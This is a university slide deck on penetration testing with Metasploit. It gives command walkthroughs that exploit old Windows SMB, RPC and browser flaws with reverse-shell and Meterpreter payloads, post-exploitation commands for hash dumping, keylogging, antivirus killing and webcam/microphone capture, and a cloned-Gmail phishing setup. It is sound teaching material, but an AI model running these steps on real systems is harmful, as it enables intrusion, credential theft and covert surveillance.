You are on page 1of 18

Network Security Metasploit

Osman SALEM Matre de Confrences


Using any unauthorized tools will get you fired/arrested/deported/smited by God, etc... This course is not intended to make you a cracker

Just a small hacker to understant the importance of patches

You are the only responsible for misuse of these tools


Once on a network, how to find vulnerability ?

Vulnerability scanner tools System penetration through vulnerability exploitation

How to get access ?

Target weak servers first to test boxes

Less likely to be patched

Steal passwords Set up relays etc. what it is capable of providing ?

Get access to:

So, what is Metasploit Framework?

Many Attack Vectors!

Gaining access to a secured system is a difficult task

requires skill and may be luck

However, the most dangerous and very effective attacks used by malicious users today are

Software exploitation attacks! Social engineering

Software Exploitation Attacks can be used to gain access to unauthorized systems:

Installation of malicious software (Spyware, Viruss, Trojans, Adware, etc.)


Understanding S.E. Attacks.

First, lets understand basics

The word vulnerability, in computer security, refers to a weakness in a

system allowing an attacker to violate the confidentiality, integrity, availability, access control, consistency or audit mechanisms of the system or the data and applications it hosts

To Software Developers, a bug is synonymous to a vulnerability

Ex: Errors in programs source code or flawed program design

Buffer overflows Memory leaks Dead locks Arithmetic overflow Accessing protected memory (Access Violation) etc.

Exploitation Exploits

Regardless the type of software bug we are speaking of Triggers an unexpected condition in program

generating an event that the program is not designed to recover successfully Redirect execution in a controlled way to run the payload The payload is a sequence of code that is executed when the vulnerability is triggered

To make things clear, an Exploit is really broken up into two parts: EXPLOIT = Vulnerability + Payload

Understanding Payloads

The payload is usually written in Assembly Language Platform and OS dependant

A Win32 payload will not work in Linux (even if we are exploiting the same bug) exec Execute a command or program on the remote system download_exec Download a file from a URL and execute upload_exec Upload a local file and execute adduser Add user to system accounts Unix /bin/sh Win command prompt cmd.exe Bind Shells and reverse Shells

Different payload types exist and they accomplish different tasks

The most common payload

Two different types of shell payloads

Auxialiaries & encoders


Scanning, sniffing, fingerprinting, etc.


Evades detection by antivirus, firefwall, IDS, IPS, etc. Encodes the payload during penetration operation

Metasploit Framework

What is the Metasploit Framework?

The Metasploit Framework is a platform for writing, testing, and using exploit code.

Provides simplified method for launching dangerous attacks

Set of exploits to launch against a box Potentially own the box Build a real exploit for your own purposes

General interface for testing & writing exploit Will not make you a cracker


Most efficient, powerful, and all-in-one centralized frontend interfaces For penetration testers to use metasploit

$ cd /pentest/exploits/framework/ $ ./msfconsole $ msf > help $ show exploits $ show payloads $ show encoders $ show -h



$ ./msfconsole $ msf > use exploit/windows/smb/ms08_067_netapi $ msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp

PAYLOAD => windows/shell/bind_tcp

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (240 bytes) to [*] Command shell session 1 opened ( -> at Sat Nov 13 19:01:23 +0000 2010 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 11



Exploitation Metasploit
Metasploit: getting a shell


Exploitation Metasploit


Exploitation Meterpreter

Take many actions

Upload/download files Read/write to registry Change file access times Execute programs


Exploitation Exploits

Modern exploits work best

ms08-067 October 2008 (1/3 machines still vuln) ms03-026 September 2003

Used by MS Blaster Used by Sasser

ms04-011 April 2004



$ ./msfconsole $ msf > use exploit/windows/smb/ms08_067_netapi $ msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp

PAYLOAD => windows/shell/reverse_tcp

msf exploit(ms08_067_netapi) show options msf exploit(ms08_067_netapi) > set LHOST

msf exploit(ms08_067_netapi) > exploit

Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>

Essayer le payload: set PAYLOAD windows/vncinject/reverse_tcp

set RHOST & set LHOST



$ ./msfconsole $ msf > use exploit/windows/dcerpc/ms03_026_dcom $ msf exploit(ms03_026_dcom) > show options msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms03_026_dcom) > set LHOST msf exploit(ms03_026_dcom) > set RHOST msf exploit(ms03_026_dcom) > exploit



$ ./msfconsole $ msf > use exploit/windows/browser/ms10_046_icon_dllloader $ msf exploit(ms10_046_icon_dllloader) > show options msf exploit(ms10_046_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms10_046_icon_dllloader) > set LHOST msf exploit(ms08_067_netapi) > exploit In browser of victime, enter the IP address of the attacker



msf > use exploit/windows/smb/ms10_061_spoolss msf exploit(ms10_061_spoolss) > show payloads msf exploit(ms10_061_spoolss) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms10_061_spoolss) > set LHOST [MY IP ADDRESS] msf exploit(ms10_061_spoolss) > set RHOST [TARGET IP] msf exploit(ms10_061_spoolss) > exploit



Information gathering

nslookup nslookup

set type=mx

whois h 193.48.xx.YY Netcraft:

nmap sS Pn nmap sS Pn A

TCP idle scan

msf msf msf msf msf msf

> use auxiliary/scanner/ip/ipidseq auxiliary(ipidseq) > show options auxiliary(ipidseq) > set RHOSTS auxiliary(ipidseq) > set THREADS 50 auxiliary(ipidseq) > run auxiliary(ipidseq) > nmap -PN -sI


Exploitation Meterpreter


A Metasploit payload Injects itself into target process as a .dll To cover your tracks




msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST

msf exploit(ms08_067_netapi) > show payloads ... msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > show options ... msf exploit(ms08_067_netapi) > set LHOST

msf exploit(ms08_067_netapi) > exploit

[*] Meterpreter session 1 opened ( ->

meterpreter > help meterpreter > getuid meterpreter > sysinfo



meterpreter > run hashdump meterpreter > ps meterpreter > migrate 3172 meterpreter > getpid meterpreter > getuid meterpreter > use_priv (to enable keystroke, you must load priv extension) meterpreter > keyscan_start //(keystroke) meterpreter > keyscan_dump meterpreter > keyscan_stop meterpreter > screenshot meterpreter > shell meterpreter > run vnc meterpreter > run killav (to kill the antivirus)



Exploitation Meterpreter

Acts as ordinary payload


SET : Social-Engineer Toolkit


SET uses Metasploit

There is a "social engineering" aspect in most hacking Tricking a user into making a mistake, that lets you in

Clicking a link Ignoring an error message Opening an attachment etc. Target: Win 7 Vuln: Java 0-Day

Today's Attack

Evil Web Server Attacker: Evil Web Server with Cloned Gmail Page

Java Exploit Code Added to Web Page

Target Using Gmail


Social Engineering

cd /pentest/exploits/SET ./set Enter option 1: Social Engineering Attacks Enter option 2: Website Attack Vectors Enter option 1: The Java Attack Method Enter option 2: Site Cloner Enter url It asks you "What payload do you want to generate:" and lists 11 choices It shows a list of 16 encodings to try and bypass AV.
Press Enter for default Press Enter for default Enter no Press Enter for default: 2. (Windows Reverse_TCP Meterpreter)

It asks you to "Enter the PORT of the listener (enter for default): It asks you whether you want to create a Linux.OSX reverse_tcp payload. It now shows blue text saying:
[*] Launching MSF Listener... [*] This may take a few to load MSF...

Wait... When it's done, you will see a whole screen scroll by as Metasploit launches, ending with this message:
msf exploit(handler) >



The target is now owned. We can

Capture screenshots Capture keystrokes Turn on the microphone and listen Turn on the webcam and take photo Steal password hashes etc.


Fun & Games

To remotely control the target:

sessions -i 1 screenshot keyscan_start keyscan_stop record_mic 10 webcam_list webcam_snap 1

Commands to try:

The Usual Stuff

This stuff is all helpful

Get Antivirus Install patches (when they exist) Keep image-based backups so you can recover after an infection

But none of it can really save you


Attack > Defense

Even corporate desktop computers are infected The Chinese got into Google and >30 other huge companies last year Don't imagine you are immune